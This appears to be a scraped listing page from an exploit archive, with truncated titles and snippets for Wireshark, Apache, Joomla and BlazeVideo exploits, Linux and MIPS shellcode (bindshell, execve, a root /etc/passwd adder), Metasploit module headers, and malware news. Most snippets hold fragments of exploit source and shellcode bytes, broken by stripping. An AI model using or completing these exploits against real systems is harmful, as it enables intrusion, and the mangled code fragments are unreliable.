Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow

Wireshark 1.4.4 - DECT Dissector Remote Buffer Overflow !/usr/bin/env python -- coding: iso-8859-15 -- a = """ \n\t-- CVE: 2011-1591 : Wireshark = 2.5 For any comments, remarks, news, please mail me : ipv at team . net \n""" import sys, struct if sys.versioninfo = 2, 5: from scapy.all import else...

linux/x86 cdda2cdr local disk exploit

! /bin/sh 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

Duqu Attackers Using Word Docs As Attack Vector

As the analysis of the Duqu malware continues to evolve, the picture that’s emerging is becoming more and more intriguing. The latest bits of evidence uncovered show that not only do the attackers create custom files for each individual attack, there is evidence indicating that they might have be...

Microsoft Windows Secure Sockets Layer Version 3.0 (CVE-2004-0120)

Secure Socket Layer SSL is a cryptographic protocol that provides security and data integrity for communications over TCP/IP networks. The protocol is considered obsolete and insecure. This protection can detect and prevent connections attempting to use this protocol. In particular, this protecti...

SCADA DNP3 Server Response Flooding

A vulnerability exists in DNP3 protocol An attacker can use this exploit to perform unauthorized actions There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...

SCADA DNP3 Unsolicited Server Response Flooding

A vulnerability exists in DNP3 protocol An attacker can use this exploit to perform unauthorized actions There are cases in which certain traffic, although not intended for malicious use, is very unsafe, since it may transfer shellcode which is undetectable by IPS...

Poison Ivy RAT Still Giving Users a Rash

The Poison Ivy malware kit is old. It was first seen in 2005, which makes it about 762 years old in Internet years. But that doesn’t mean it’s no longer useful, as evinced by the data collected by Microsoft in a new report on the tool, which shows that it is still in active use and is turning up ...

linux/x86 execve("/usr/bin/ftp", "sdf.lonestar.org", NULL) 73 bytes

/ 73 bytes sysexecve"/usr/bin/ftp", "sdf.lonestar.org", NULL polymorphic shellcode Tested On : Debian Squeeze 6.02 Linux x86-based OS Programmer : Paulus Gandung Prakosa 0x1337day Thanks to : mywisdom, chaer.newbie, wenkhairu, ketek, gunslinger, nofiafitri, xtr0nic, t3k0, tabun, petimati, and all...

MIPS Linux XOR Shellcode Encoder 60 Bytes

MIPS Linux XOR Shellcode Encoder 60 Bytes. Shellcode exploit for linuxmips platform include include include include include include include define DEBUG 0 / entropy at phiral.net mips linux shellcode xor encoder \xAB\xCD is overwritten with jmp back offset \x00\x00 is overwritten with the byte it...

Joomla NoNumber Framework Local File Inclusion / Shell Upload

Exploit Title: NoNumber Framework Joomla! Plugin Multiple Vulnerabilities Discovery Date: 10 October 2011 Reported Date: 11 October 2011 Patch Date: 17 October 2011 Release Date: 17 October 2011 Author: jdc Software Link: http://nonumber.nl The nnframework plugin by NoNumber! contains multiple...

Apache 2.2.0 - 2.2.11 Remote exploit

No description provided by source. include include include include include include include include void usagechar argv printf"Usage: %s \n\n",argv0; exit1; int mainint argc,char argv // weareevilweareevilbindshell31337shellcodein91bytes: char shellcode= "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50"...

Multiple G-WAN vulnerabilities

======================================================================== Title: Multiple G-WAN vulnerabilities Product: G-WAN http://gwan.com/ Author: Fredrik Widlund E-mail: fredrik.widlund at gmail dot com Date: 2011-10-12 ========================================================================...

PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD

Exploit for windows platform in category remote exploits $Id: pcvuefunc.rb 13889 2011-10-12 10:57:31Z sinn3r $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on...

52 byte Linux MIPS execve

52 byte Linux MIPS execve. Shellcode exploit for linuxmips platform include / entropy at phiral.net 52 byte linux mips shellcode oh werd [email protected] /encode/1/2 cat s.s .section .text .globl start .set noreorder start: li $a2, 0x666 p: bltzal $a2, p slti $a2, $zero, -1 addu $sp, $sp, -32...

BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass

BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass Exploit Title: BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass Author: modpr0be Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro Date: 07/10/2011 Tested on: Windows XP SP3,...

linux/mips Lexecve 52 byte

; universal OSX dyld ROP shellcode ; tested on OS X 10.6.8 ; ; if you don't want to compile, copy stage0 code from precompiled.txt ; and append your normal shellcode to it. ; ; usage: ; - put your 'normal' shellcode in x64shellcode.asm ; - make ; - ./sc ; ; if you want to test: ; - uncomment lea...

BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass

Exploit for windows platform in category local exploits Exploit Title: BlazeVideo HDTV Player 6.6 Professional Universal DEP+ASLR Bypass Author: modpr0be Software Download: http://www.blazevideo.com/download.php?product=blazevideo-hdtv-pro Date: 07/10/2011 Tested on: Windows XP SP3, Windows Vista...

Web Servers HTTP Flooding Denial of Service

The vulnerability is due to the server's inability to handle multiple incoming HTTP requests within a short period of time. Remote attackers may exploit this issue by rapidly sending a large number of HTTP requests to the server. The attack may be initiated from one or more sources DDoS. Successf...

linux/x86 Addnew Users 'root' /etc/passwd shell code 79 bytes

=============================================================== Linux X86 Addnew Users 'Ro0t' /etc/passwd shell code 79 bytes =============================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, ...

Quick easy ftp server 4.0.0 plurality of command format string vulnerability-vulnerability warning-the black bar safety net

Version: Quick easy ftp server 4.0.0 other version not test Test: W2K SP4 Quick easy ftp server 4.0.0 is not safe to use wsprintfA function for string operations, resulting in format string vulnerabilities. The affected commands include LS, CD, USER, etc. Wherein the USER command does not need to...